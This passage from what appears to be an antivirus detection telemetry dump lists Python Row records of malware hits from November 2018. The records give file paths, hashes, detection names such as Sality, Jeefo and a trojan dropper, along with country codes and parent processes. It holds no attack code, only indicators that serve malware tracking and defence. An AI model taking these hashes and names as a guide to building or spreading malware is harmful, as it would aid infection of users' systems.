  Row(detection=Row(filename='f9ff2c44c5e8487f1a23d5a3c3a9563f100a301438990bf0d168ee4a9c70743e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F9FF2C44C5E8487F1A23D5A3C3A9563F100A301438990BF0D168EE4A9C70743E', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='f9ff2c44c5e8487f1a23d5a3c3a9563f100a301438990bf0d168ee4a9c70743e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:43:39Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-155924-e95b4d82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155924-E95B4D82', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-03-20-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T20:30:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182047-7d735a76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-181849-686C7A54\\AVSCAN-20181102-182047-7D735A76', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:20:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='basic.exe', filepath='\\\\?\\D:\\هوشمند\\Hooshmand\\CH_ENGLISH\\Basic\\Basic.exe', filesize=3072000, name='HEUR/APC.#M1.#R1'), hash='1bb80ab49f64b178fc3a25b4982c17162a65ff43a170e010b740c70e00a4c989', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dc_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\DC_SE\\DC_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T00:52:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ext.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\jre\\lib\\ext\\ext.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151206-f856a73b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa3c7867\\AVSCAN-20181102-150905-DCEB4FE7\\AVSCAN-20181102-151206-F856A73B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133823-d57c42a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d1379a4\\AVSCAN-20181102-132511-4B737FC7\\AVSCAN-20181102-133823-D57C42A0', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='626596cbba33ca077633c742d15edb9bd1be3ad602c74aa84d3634b6556b0f8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212221-21c0bafb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dae45dc9\\AVSCAN-20181102-212202-1F6D8A2B\\AVSCAN-20181102-212221-21C0BAFB', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-u -p 9860 -s 100', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T20:00:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T21:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T14:15:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\43ECE90B6B536A6E39C4D893294F61EC43917C306785515BD289D311197A9E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7146048\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\giiiiiii\\pós\\aTubeCatcher_0430893490.exe', parentsize=2344378, timestamp='2018-11-02T03:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:09:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\FDImages\\WinMe\\disk1\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2357eea171d10095aca83f7d725945e67e37415f5d0a733d95d190b059d16905', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221444-585e2577', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221444-585E2577', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171200-6ad1b918', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-171046-5BBD7D9E\\AVSCAN-20181102-171200-6AD1B918', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:12:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051354-7bc5d9a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-051354-7BC5D9A0', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152430-fc916cb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4a0cadc4\\AVSCAN-20181102-143721-EEDE8C28\\AVSCAN-20181102-152430-FC916CB4', filesize=109056000, name='HEUR/AGEN.1026193.#M1.#R1'), hash='10038775df000cc4209e21277211009d3669e2e46f1d5577dc875916f958348a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DE5FBAC9FDA9A5CB9195EBC9162F8101DA8C96FC2CF5FB669A905636D5A804B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163003-dcc5b996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b25ab4e\\AVSCAN-20181102-162834-CD9A72A7\\AVSCAN-20181102-163003-DCC5B996', filesize=2288000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta vice city user files.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\GTA Vice City User Files\\GTA Vice City User Files.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\SWDE\\C-GML\\bin\\transfer.EXE', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:23:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173704-4904f89d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-173704-4904F89D', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='client.exe', filepath='C:\\Users\\X\\Desktop\\C_8_To-Disk-2\\CEHv8 Module 06 Trojans and Backdoors\\Miscellaneous Trojans\\Assasin v2.0\\Assasin 2.0 Final\\client.exe', filesize=640000, name='BDC/Assasin.20.B.#M1.#R1'), hash='2319cfafbdcfddcda808eeaac3eab6065a85c63d39d926a7d3c5c9909c504783', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\EC-Council Certified Ethical Hacker CEH v8 (Tools)\\\\\\\\EC-Council.Certified.Ethical.Hacker.CEH.v8.Tools.DVD2\\\\\\\\C_8_To-Disk-2.iso\\\\\\"', country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-02T13:54:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085303-8d43742d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085251-8ACC12B8\\AVSCAN-20181102-085303-8D43742D', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gag.dll', filepath='ProgramFilesDir/[PluginsDir]/gag.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='1637407ac610ce29ed4f4f1c6da3cb8f683c502374d0638389fe3c8e2bdc7c91', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:02Z'), dt=datetime.date(2018, 11, 2)),
